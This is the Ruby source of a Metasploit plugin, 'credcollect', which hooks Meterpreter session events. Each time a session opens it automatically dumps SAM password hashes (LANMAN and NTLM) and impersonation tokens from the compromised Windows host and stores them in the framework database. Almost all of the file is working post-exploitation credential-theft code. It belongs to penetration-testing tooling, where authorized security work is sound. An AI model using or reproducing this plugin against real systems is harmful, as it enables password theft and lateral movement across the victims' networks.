123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109 |
- # credcollect - tebo[at]attackresearch.com
- module Msf
- class Plugin::CredCollect < Msf::Plugin
- include Msf::SessionEvent
- class CredCollectCommandDispatcher
- include Msf::Ui::Console::CommandDispatcher
- def name
- 'credcollect'
- end
- def commands
- {
- 'db_hashes' => "Dumps hashes (deprecated: use 'creds -s smb')",
- 'db_tokens' => "Dumps tokens (deprecated: use 'notes -t smb_token')"
- }
- end
- def cmd_db_hashes
- print_error ''
- print_error "db_hashes is deprecated. Use 'creds -s smb' instead."
- print_error ''
- end
- def cmd_db_tokens
- print_error ''
- print_error "db_tokens is deprecated. Use 'notes -t smb_token' instead."
- print_error ''
- end
- end
- def on_session_open(session)
- return if !framework.db.active
- print_status('This is CredCollect, I have the conn!')
- if (session.type == 'meterpreter')
- # Make sure we're rockin Priv and Incognito
- session.core.use('priv')
- session.core.use('incognito')
- # It wasn't me mom! Stinko did it!
- hashes = session.priv.sam_hashes
- # Target infos for the db record
- addr = session.sock.peerhost
- # This ought to read from the exploit's datastore.
- # Use the meterpreter script if you need to control it.
- smb_port = 445
- # Record hashes to the running db instance
- hashes.each do |hash|
- data = {}
- data[:host] = addr
- data[:port] = smb_port
- data[:sname] = 'smb'
- data[:user] = hash.user_name
- data[:pass] = hash.lanman + ':' + hash.ntlm
- data[:type] = 'smb_hash'
- data[:active] = true
- framework.db.report_auth_info(data)
- end
- # Record user tokens
- tokens = session.incognito.incognito_list_tokens(0).values
- # Meh, tokens come to us as a formatted string
- tokens = tokens.join.strip!.split("\n")
- tokens.each do |token|
- data = {}
- data[:host] = addr
- data[:type] = 'smb_token'
- data[:data] = token
- data[:update] = :unique_data
- framework.db.report_note(data)
- end
- end
- end
- def on_session_close(session, reason = ''); end
- def initialize(framework, opts)
- super
- self.framework.events.add_session_subscriber(self)
- add_console_dispatcher(CredCollectCommandDispatcher)
- end
- def cleanup
- framework.events.remove_session_subscriber(self)
- remove_console_dispatcher('credcollect')
- end
- def name
- 'db_credcollect'
- end
- def desc
- 'Automatically grab hashes and tokens from Meterpreter session events and store them in the database'
- end
- end
- end
|